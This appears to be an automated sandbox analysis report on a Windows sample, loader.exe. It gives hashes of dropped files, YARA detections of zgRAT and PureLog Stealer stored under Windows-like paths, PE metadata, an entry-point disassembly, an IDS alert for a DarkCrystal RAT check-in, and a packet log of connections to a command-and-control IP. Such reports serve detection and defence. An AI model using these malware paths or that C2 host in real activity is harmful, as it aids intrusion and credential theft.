                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (871), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):871
                                                                                  Entropy (8bit):5.90529679902115
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:oEXcy431mB6Hc1A1SyZy3dsEaQzc19rqyK97PJ0uQDX:oucJ3W6F1SyZBEaOCOyKf0uQDX
                                                                                  MD5:4D7188DBC9EAB320E39F59F524422241
                                                                                  SHA1:CD7FEF61728510A3588621EC80C8314E5A9149AE
                                                                                  SHA-256:94CA180B0F21EC392DB6BD76CFC768CC5EA641898E3C5067566113C4D8EA9213
                                                                                  SHA-512:8109F7ABA4B8A7C58BF8BF955BF092FC7F7F724BA6834F99AE29F2AAA489720911C9C33F30D1A190CAF9CBF1DC893B1F005924F21FDC80F93BFE42CD05EB5156
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (649), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):649
                                                                                  Entropy (8bit):5.885071594411007
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:ZuNp8fdRh4vQxzpVL4jQ31+1JlccwS4VMoNYJq5/3i+IIASw:gNpAR+IxVJuQ3M13ZIbNYoZ3i+IIAD
                                                                                  MD5:3511A44FB064121721D60BE01E1AAA17
                                                                                  SHA1:906564440FF602995ADAA88DDF64E0B261A1155B
                                                                                  SHA-256:0703EAEB2EE1B3BBA50E21683E2297F81BD32ED620F02D6A25A9F8ED5AB74E88
                                                                                  SHA-512:CD676413997A634EB8789DFB8B1050D39135330B2939D0ADD43BA9986401F54487224BF91304D0007F122E2344A29BC0260E4D67838AD9CB3D1FB79A202FBED5
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):1224
                                                                                  Entropy (8bit):4.435108676655666
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4608
                                                                                  Entropy (8bit):3.9486045583653926
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6VJzPt5M7Jt8Bs3FJsdcV4MKe27qd4iE76xvqBHWOulajfqXSfbNtm:APYPc+Vx9MqJE76xvkwcjRzNt
                                                                                  MD5:FF4FED55573F11D253BEB119AF2C3564
                                                                                  SHA1:BF959EF84A8F86AF3E60084769A38CBB9CF2DBCA
                                                                                  SHA-256:35020EB13BA8ADB2D91438101826E9BE2126C71A3C8DEC3404E8AC772A17B36D
                                                                                  SHA-512:D98C602628EA002CA471047DB5277CF48982D3B0FD771B22419EE71F35C0BB5B522B017BAD97533C8A5C9343E5C467CA0971CDB5892DA0ECC3B7BB64943A609C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):151
                                                                                  Entropy (8bit):4.786697028237252
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXaTX9QvPEr0fbAXXKvpMP0qvj:Vx993DEURRysXj
                                                                                  MD5:7F230AC816B49FC9D0A7233F6805145D
                                                                                  SHA1:1F0100ABA2A45D7CF8BD1BA052D33EFA4C53F9DE
                                                                                  SHA-256:47635E19C36142437C2A224E100CD96D5378895DCF0A8EBF9D6C1C0EEBB53078
                                                                                  SHA-512:1FAE8688EE2B61365D30664E932291906F3BCC77B1AB9B3A3187613E71E912D9577F02654BC5BF9D17EE4B4F12A8DF62D5BE08848FCF453EBCE69E2A09D9BA30
                                                                                  Malicious:false
                                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/01/2025 02:16:08..02:16:08, error: 0x80072746.02:16:13, error: 0x80072746.
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.785550696535967
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:loader.exe
                                                                                  File size:3'314'471 bytes
                                                                                  MD5:2307ca04c2633d28345fb0580c77c2ec
                                                                                  SHA1:edbd1f092ed03cb2674877aba6e874722ee07814
                                                                                  SHA256:168637ea64d64afefd1f88b91ffecb74715ccb6a98acf73d4a16175511628276
                                                                                  SHA512:c2646c5bf3dcd6ef4679af80ae6424c1f88e3f29a40beff729b59bebd8fd3d9b0d45392d2e11f4e1b69ada0f4ec20cfc45430d184cdf0238f2845b7deaff7e9b
                                                                                  SSDEEP:98304:ups+iZyomWShz+6WumEq5GGxLnIlP2NgQKGfxx:ndZOhNWumEqxLIB21K6H
                                                                                  TLSH:24E5E0195AD24E37C27467324597103D43A0D7767D72EB1A360F20E2A903BB6CBB62B7
                                                                                  Icon Hash:1767d1b1b1d46917
                                                                                  Entrypoint:0x403e50
                                                                                  Entrypoint Section:
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:d89f3dcdac0c8dba11dc1162435bedbb
                                                                                  Instruction
                                                                                  call 00007F7D4C7C4D76h
                                                                                  jmp 00007F7D4C7C4B8Eh
                                                                                  push 0044BB60h
                                                                                  push dword ptr fs:[00000000h]
                                                                                  mov eax, dword ptr [esp+10h]
                                                                                  mov dword ptr [esp+10h], ebp
                                                                                  lea ebp, dword ptr [esp+10h]
                                                                                  sub esp, eax
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov eax, dword ptr [00466ECCh]
                                                                                  xor dword ptr [ebp-04h], eax
                                                                                  xor eax, ebp
                                                                                  push eax
                                                                                  mov dword ptr [ebp-18h], esp
                                                                                  push dword ptr [ebp-08h]
                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  mov dword ptr [ebp-08h], eax
                                                                                  lea eax, dword ptr [ebp-10h]
                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                  ret
                                                                                  mov ecx, dword ptr [ebp-10h]
                                                                                  mov dword ptr fs:[00000000h], ecx
                                                                                  pop ecx
                                                                                  pop edi
                                                                                  pop edi
                                                                                  pop esi
                                                                                  pop ebx
                                                                                  mov esp, ebp
                                                                                  pop ebp
                                                                                  push ecx
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  add esp, 04h
                                                                                  jmp 00007F7D4CBB292Fh
                                                                                  out dx, al
                                                                                  add byte ptr [edi], cl
                                                                                  mov bh, bh
                                                                                  push ebp
                                                                                  cmp byte ptr [ebx], ah
                                                                                  pop eax
                                                                                  call far 7520h : BE5F4EFAh
                                                                                  inc ecx
                                                                                  ret
                                                                                  pop ebp
                                                                                  xchg byte ptr [B763C74Bh], dh
                                                                                  inc esi
                                                                                  stosb
                                                                                  mov al, byte ptr [8DF537CAh]
                                                                                  mov word ptr [eax], fs
                                                                                  push ebx
                                                                                  lahf
                                                                                  push ecx
                                                                                  pop ecx
                                                                                  rcl dword ptr [ecx+7Bh], FFFFFFCCh
                                                                                  jc 00007F7D4C7C4D7Ah
                                                                                  mov byte ptr [ecx+2B28726Dh], dl
                                                                                  dec edi
                                                                                  dec esp
                                                                                  sar byte ptr [edx], 1
                                                                                  cmp ecx, dword ptr [ecx+esi*2+61h]
                                                                                  cdq
                                                                                  jnl 00007F7D4C7C4CC0h
                                                                                  pop ebp
                                                                                  std
                                                                                  movsb
                                                                                  push ebp
                                                                                  in al, 24h
                                                                                  adc ah, byte ptr [edx]
                                                                                  cmp al, F9h
                                                                                  pop esi
                                                                                  outsd
                                                                                  lodsb
                                                                                  imul ecx, dword ptr [edx+eax*2], 63A9D3FCh
                                                                                  inc ebx
                                                                                  mov bh, 62h
                                                                                  jo 00007F7D4C7C4D04h
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x30e020 | 0x34 | cheat |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30e054 | 0x210 | cheat |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7d000 | 0x12aec | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x30e000 | 0xc | cheat |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x32000 | 0x1be00 | 8fe0979436817318cbc0e9cefcfd6da8 | False | 0.997276135089686 | data | 7.9966173970846315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x33000 | 0xb000 | 0x4800 | 1f89350db9659affeed8b007e363a875 | False | 0.9948459201388888 | data | 7.980672042041817 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x3e000 | 0x25000 | 0x800 | ef9ca6049a80a49fd3f9d2ad4b52d97d | False | 0.91162109375 | data | 7.4680767408434345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x63000 | 0x1000 | 0x200 | 8a6f114c8b2a3ee64ca1d82d6be339e8 | False | 0.4453125 | data | 3.7813580233499082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x64000 | 0x16000 | 0x2600 | e0a332328574052591e79b2a921f110b | False | 0.9833470394736842 | data | 7.940310001309214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x7a000 | 0x3000 | 0x2000 | e39ec2ca62447a50635a635042b41792 | False | 0.9580078125 | data | 7.847280090655699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x7d000 | 0x13000 | 0x12c00 | 28cfe84555d1d637f43a1088bab53028 | False | 0.9374609375 | data | 7.86163703105012 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x90000 | 0x27e000 | 0x2ba00 | 03227782dc57116467257c779fd82c72 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| cheat | 0x30e000 | 0xe7000 | 0xe6600 | 0e69e40f60ca9471cb4b6a5a0a0ba889 | False | 0.9968048443434617 | data | 7.983850693923614 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| PNG | 0x64524 | 0xb45 | data | English | United States | 1.0038128249566725 |
| PNG | 0x6506c | 0x15a9 | data | English | United States | 0.9710354815351194 |
| RT_ICON | 0x7d524 | 0x10de5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0004486706323361 |
| RT_DIALOG | 0x77400 | 0x286 | empty | English | United States | 0 |
| RT_DIALOG | 0x77688 | 0x13a | empty | English | United States | 0 |
| RT_DIALOG | 0x777c4 | 0xec | empty | English | United States | 0 |
| RT_DIALOG | 0x778b0 | 0x12e | empty | English | United States | 0 |
| RT_DIALOG | 0x779e0 | 0x338 | empty | English | United States | 0 |
| RT_DIALOG | 0x77d18 | 0x252 | empty | English | United States | 0 |
| RT_STRING | 0x8e30c | 0x1e2 | data | English | United States | 0.3900414937759336 |
| RT_STRING | 0x8e4f0 | 0x1cc | data | English | United States | 0.4282608695652174 |
| RT_STRING | 0x8e6bc | 0x1b8 | data | English | United States | 0.45681818181818185 |
| RT_STRING | 0x8e874 | 0x146 | data | English | United States | 0.5153374233128835 |
| RT_STRING | 0x8e9bc | 0x46c | data | English | United States | 0.3454063604240283 |
| RT_STRING | 0x8ee28 | 0x166 | data | English | United States | 0.49162011173184356 |
| RT_STRING | 0x8ef90 | 0x152 | data | English | United States | 0.5059171597633136 |
| RT_STRING | 0x8f0e4 | 0x10a | data | English | United States | 0.49624060150375937 |
| RT_STRING | 0x8f1f0 | 0xbc | data | English | United States | 0.6329787234042553 |
| RT_STRING | 0x8f2ac | 0xd6 | data | English | United States | 0.5747663551401869 |
| RT_GROUP_ICON | 0x8f384 | 0x14 | Targa image data - Map 32 x 3557 x 1 +1 | | | 1.1 |
| RT_MANIFEST | 0x8f398 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |
| DLL | Import |
| kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA |
| user32.dll | MessageBoxA |
| advapi32.dll | RegCloseKey |
| oleaut32.dll | SysFreeString |
| gdi32.dll | CreateFontA |
| shell32.dll | ShellExecuteA |
| version.dll | GetFileVersionInfoA |
| gdiplus.dll | GdipAlloc |
| Language of compilation system | Country where language is spoken | Map |
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2025-01-11T06:43:15.910693+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 56905 | 37.44.238.250 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                  Jan 11, 2025 06:43:20.242187977 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:20.250252008 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.250268936 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.250277996 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.520787001 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.570560932 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:20.571635962 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:20.650435925 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.700635910 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.102345943 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.107323885 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.107372046 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.199193001 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.204046011 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.204123020 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.204328060 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.209137917 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.551412106 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.557477951 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.557518959 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.557549000 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.848150015 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.020170927 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.021879911 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.129446030 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.209765911 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.210462093 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.215286016 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.215383053 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.215794086 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.215868950 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.215986967 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.222553015 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.349539995 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.354450941 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.354532957 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.354626894 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.359523058 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.567076921 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.571837902 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.571964025 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.571976900 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.707684040 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.712555885 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.712722063 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.848571062 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.983200073 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.983805895 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.007421017 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.139133930 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.141657114 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.375610113 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.377427101 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.380669117 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.380743027 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.382401943 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.382477999 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.124082088 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.128954887 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.129137993 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.129266977 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.134125948 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.473403931 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.478338957 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.478353024 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.478363991 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.797979116 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.930340052 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.934185982 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.431988955 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.434700012 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.437024117 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.437082052 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.439488888 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.439563990 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.440104008 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.444902897 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.785851955 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.792166948 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.792207003 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.792234898 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:26.066072941 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:26.129472971 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:26.193763971 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:26.332644939 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.163856983 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.168793917 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.168864965 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.169143915 CET5697380192.168.2.637.44.238.250
